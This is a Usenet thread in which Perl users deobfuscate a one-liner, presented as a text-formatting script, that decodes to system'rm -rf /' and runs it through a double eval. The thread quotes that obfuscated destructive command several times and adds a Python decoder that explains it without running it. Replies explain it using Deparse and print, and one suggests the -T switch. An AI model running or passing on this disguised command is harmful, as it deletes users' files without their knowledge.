Perl tricks

 
 
Andrei Koulik
 
      09-25-2003
Can anybody explain to me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
-;;s;;$_;see'

 
 
 
 
 
Charles DeRykus
 
      09-25-2003
In article <bku8sv$63cvq$(E-Mail Removed)-berlin.de>,
Andrei Koulik <(E-Mail Removed)> wrote:
>Can anybody explain to me how this command deletes files:
>perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
>-;;s;;$_;see'



You can use Deparse to get a clearer view:

perl -MO=Deparse
$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see
^D

$?->perl ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
tr( -/:-@[-`{-})[`-{/"\-];
s//$_;/see;

The evil is lurking in the final double eval. Comment that
line and throw in a 'print' after preceding statements,

....
tr( -/:-@[-`{-})[`-{/"\-]; print;
#s//$_;/see;

Ah, the $_ that the double eval loads up with is:

system"rm--rf-/"

HTH,
--
Charles DeRykus
 
 
 
 
 
John W. Krahn
 
      09-25-2003
Andrei Koulik wrote:
>
> Can anybody explain to me how this command deletes files:
> perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


Just change the "s;;$_;see" at the end to "print":

$ perl -le '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;print'
system"rm -rf /"


John
--
use Perl;
program
fulfillment
 
 
David
 
      09-25-2003
Andrei Koulik <(E-Mail Removed)> wrote in message news:<bku8sv$63cvq$(E-Mail Removed)-berlin.de>...
> Can anybody explain to me how this command deletes files:
> perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
> -;;s;;$_;see'


translation:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

tr( -/:-@[-`{-})[`-{/"\-];

s//do{
$_;
};/see;

more translation:

1. this:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

essentially translates to:

$_ = '=]=>%-{<-|}<&|`{';

look up perldoc perlvar to see what $? holds and you will know why.

2. this:

tr( -/:-@[-`{-})[`-{/"\-];

has a few components. those between '(' and ')' are characters to be translated:

' -/' means: all characters between the space and '/'
':-@' means: all characters between ':' and '@'
'[-`' means: all characters between '[' and '`'
'{-}' means: all characters between '{' and '}'

those between '[' and ']' are characters translated to:

'`-{' means: all characters between '`' and '{'
'/" \-' means just the literal characters.

so you are translating:

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/" -

characters from upper string to the lower string.

now notice what $_ is; plugging in the translation gives $_ to be:

system"rm -rf /"

3. isn't it clear from now on?

s//do{
$_;
};/see;

'ee' basically runs the system call via do{}.

4. question: are you going to run that to confirm what i said?

david
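
The `tr` step walked through above, as an added example that is not part of the original posts: a Python decoder that expands the range lists and applies the mapping without running any Perl. It also applies Perl's rule of padding a short replacement list with its last character, so the list as printed in the Deparse output earlier in the thread (no space before the final `-`) decodes differently from the list as originally posted. All function and constant names are this example's own.

```python
# Added example: static decoder for the tr/// step; nothing here is executed as Perl.

SEED = "=]=>%-{<-|}<&|`{"        # string the first statement leaves in $_
SEARCH = " -/:-@[-`{-}"          # tr search list from the one-liner
REPLACE_POSTED = '`-{/" -'       # replacement list as originally posted
REPLACE_DEPARSED = r'`-{/"\-'    # replacement list as printed in the Deparse output


def _take(spec, i):
    """Return (char, next_index) at position i, honouring a backslash escape."""
    if spec[i] == "\\" and i + 1 < len(spec):
        return spec[i + 1], i + 2
    return spec[i], i + 1


def expand_tr_list(spec):
    """Expand a Perl tr/// list: 'a-c' -> 'abc'; a leading or trailing '-' is literal."""
    out, i = [], 0
    while i < len(spec):
        lo, i = _take(spec, i)
        if i + 1 < len(spec) and spec[i] == "-":
            hi, i = _take(spec, i + 1)
            if ord(hi) < ord(lo):
                raise ValueError(f"invalid range {lo}-{hi}")
            out.extend(chr(c) for c in range(ord(lo), ord(hi) + 1))
        else:
            out.append(lo)
    return "".join(out)


def perl_tr(text, search, replace):
    """Apply tr/search/replace/ (no modifiers) to text and return the result."""
    src = expand_tr_list(search)
    if not src:
        return text
    dst = expand_tr_list(replace) or src      # empty replacement list: identity
    dst += dst[-1] * (len(src) - len(dst))    # Perl repeats the last char to pad
    table = {}
    for s, d in zip(src, dst):
        table.setdefault(ord(s), d)           # first occurrence in the search list wins
    return text.translate(table)


if __name__ == "__main__":
    print(perl_tr(SEED, SEARCH, REPLACE_POSTED))
    print(perl_tr(SEED, SEARCH, REPLACE_DEPARSED))
```

The first line printed matches the `print` output shown by John W. Krahn, the second the string reported after the Deparse run.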
 
 
Jay Tilton
 
      09-25-2003
Andrei Koulik <(E-Mail Removed)> wrote:

: Can anybody explain to me how this command deletes files:
: perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
: -;;s;;$_;see'

Start by running it through the Deparse backend to get rid of some
obfuscating elements, then add some whitespace for readability.

$? ? s/;s/s;;$?/
: s//=]=>%-{<-|}<&|`{/ ;

That puts the string "=]=>%-{<-|}<&|`{" into $_ .

Beyond extra obfuscation, I don't know what "s/;s/s;;$?/" could have to
do with anything--I don't know of a circumstance where $? would hold a
true value when the program starts execution.

tr ( -/:-@[-`{-})
[`-{/" \-] ;

That alters the characters in $_.
If you print it now, it will read 'system"rm -rf /"' .

s//do { $_ };/see ;

That's just a hairy way of saying "eval $_" .

So were you aware of the code's malicious nature before running it, or
did something terrible happen?

 
 
Andrei Koulik
 
      09-26-2003
Thank you all very much.
Yesterday I parsed it manually the way John W. Krahn does, but from
your replies I have learnt some useful things.

Andrei Koulik wrote:

> Can anybody explain to me how this command deletes files:
> perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
> -;;s;;$_;see'
>


 
 
Andrei Koulik
 
      09-26-2003


Jay Tilton wrote:
......
>
> So were you aware of the code's malicious nature before running it, or
> did something terrible happen?
>

I was asked to debug a script for text formation:

cat "test... test... test..." | perl -e
'$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

but I noted that neither the -n nor the -p option is used, so I started to debug it on
behalf of the news user (it doesn't own any files).
But after some steps, the lines:
....
rm: /usr/bin/objcopy: Permission denied
rm: /usr/bin/objdump: Permission denied
rm: /usr/bin/ranlib: Permission denied
....
were printed. When I pressed ctrl-c the output froze, but beeping
started and the terminal didn't respond to any keys.
I didn't know what had happened, and so I had to understand what this program
actually does to detect possible injuries.


 
 
Jay Tilton
 
      09-26-2003
Andrei Koulik <(E-Mail Removed)> wrote:

: Jay Tilton wrote:
: .....
: >
: > So were you aware of the code's malicious nature before running it, or
: > did something terrible happen?
: >
: I was asked to debug a script for text formation:
:
: cat "test... test... test..." | perl -e
: '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
:
: but I noted that neither the -n nor the -p option is used, so I started to debug it on
: behalf of the news user (it doesn't own any files).
:
: But after some steps, the lines:
: ...
: rm: /usr/bin/objcopy: Permission denied
: rm: /usr/bin/objdump: Permission denied
: rm: /usr/bin/ranlib: Permission denied
: ...
: were printed. When I pressed ctrl-c the output froze, but beeping
: started and the terminal didn't respond to any keys.
: I didn't know what had happened, and so I had to understand what this program
: actually does to detect possible injuries.

Next time you feel compelled to run a mysterious script like that, you
might want to use perl's -T switch, at the least. In this case, it
would have halted the program with an "Insecure $ENV{PATH}" error before
any mischief could begin.

 